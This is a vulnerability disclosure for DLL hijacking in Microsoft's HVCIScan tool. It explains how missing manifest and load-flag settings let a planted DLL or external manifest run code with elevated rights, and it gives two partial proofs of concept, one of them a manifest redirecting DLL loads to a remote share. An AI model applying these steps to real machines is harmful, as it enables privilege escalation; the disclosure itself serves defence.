Microsoft HVCIScan DLL Hijacking

2023.06.13
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Hi @ll, about a month ago Microsoft published HVCIScan-{amd,arm}64.exe, a "Tool to check devices for compatibility with memory integrity (HVCI)" The "Install instructions" on the download page <https://www.microsoft.com/en-us/download/105217> tell: | Download the hvciscan.exe for your system architecture (AMD64 or ARM64). | From an elevated command window or PowerShell, run hvciscan.exe "ELEVATED" sounds good, especially when such a vulnerable tool is run from the "Downloads" folder, where a file HVCIScan_amd64.exe.manifest, HVCIScan_arm64.exe.manifest or VBSAPI.dll can be placed via "drive-by" download or by the (unsuspecting) unelevated user who still abuses the "protected administrator" account created during Windows setup. Oops, one step back: how did I determine a) that HVCIScan-*.exe is vulnerable b) these filenames? Open an UNELEVATED command window and run LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_amd64.exe and/or LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_arm64.exe then inspect the output. | Dump of file HVCIScan_amd64.exe | | File Type: EXECUTABLE IMAGE | | Image has the following dependencies: | | KERNEL32.dll | msvcrt.dll | VbsApi.dll ~~~~~~~~~~ | Section contains the following load config: | ... | 0000 Dependend load flags ... | Summary | | 1000 .data | 1000 .pdata | 2000 .rdata | 1000 .reloc | 1000 .text OUCH: the guys at M$FT built these tools without embedded "application manifest" (which would have been placed in a ".rsrc" section), so Windows will apply an external "application manifest", and without /DEPENDENTLOADFLAG:2048, so Windows will search dependent DLLs not listed as "Known DLL" in the "application directory" first. Both omissions^WBEGINNER'S MISTAKES allow to load and execute ARBITRARY DLLs from ARBITRARY paths that run with the (ELEVATED) credentials of the application! "Trustworthy Computing" anyone? Or "Security Development Lifecycle"? <https://www.microsoft.com/en-us/securityengineering/sdl> Proof of concept #1: ~~~~~~~~~~~~~~~~~~~~ a) Open an UNELEVATED command window in the directory where you saved HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe b) Create an empty file VbsApi.dll next to the executable: COPY NUL: VbsApi.dll c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error message that VbsApi.dll can't be loaded. Building a VbsApi.dll with the exports required by HVCIScan-a??64.exe to actually load and execute VbsApi.dll is left as an exercise to the reader. See <https://skanthak.homepage.t-online.de/minesweeper.html> if you need help. Proof of concept #2: ~~~~~~~~~~~~~~~~~~~~ a) Create the text file HVCISCAN_amd64.exe.manifest respectively HVCISCAN_arm64.exe.manifest with the following content next to HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe: --- HVCISCAN_a??64.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes" ?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="KERNEL32.dll" /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="msvcrt.dll" /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="VbsApi.dll" /> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> </assembly> --- EOF --- Replace the UNC path \\SERVER\SHARE\arbitrary.dll with any local or remote path where you can create the specified file. NOTE: the section "trustInfo" is optional. NOTE: KERNEL32.dll and MSVCRT.dll are "Known DLLs". b) Create an empty file arbitrary.dll in the specified network share or local directory: COPY NUL: \\SERVER\SHARE\arbitrary.dll c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error message that a required DLL or an entry point is not found. Building \\SERVER\SHARE\arbitrary.dll with the exports required by HVCIScan-a??64.exe to actually load and execute arbitrary.dll is left as an exercise to the reader. stay tuned, and far away from "tools" made in Redmond Stefan Kanthak


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top